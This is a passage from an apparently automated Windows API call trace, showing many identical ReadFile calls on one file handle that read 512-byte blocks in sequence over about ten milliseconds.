hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.434] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.435] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.436] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.437] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.438] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, 